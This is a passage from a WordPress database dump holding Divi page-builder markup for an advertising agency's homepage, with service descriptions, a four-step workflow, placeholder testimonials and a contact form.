header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 12:08:32','2020-08-07 12:08:32','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(467,1,'2020-08-07 12:09:14','2020-08-07 12:09:14','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" 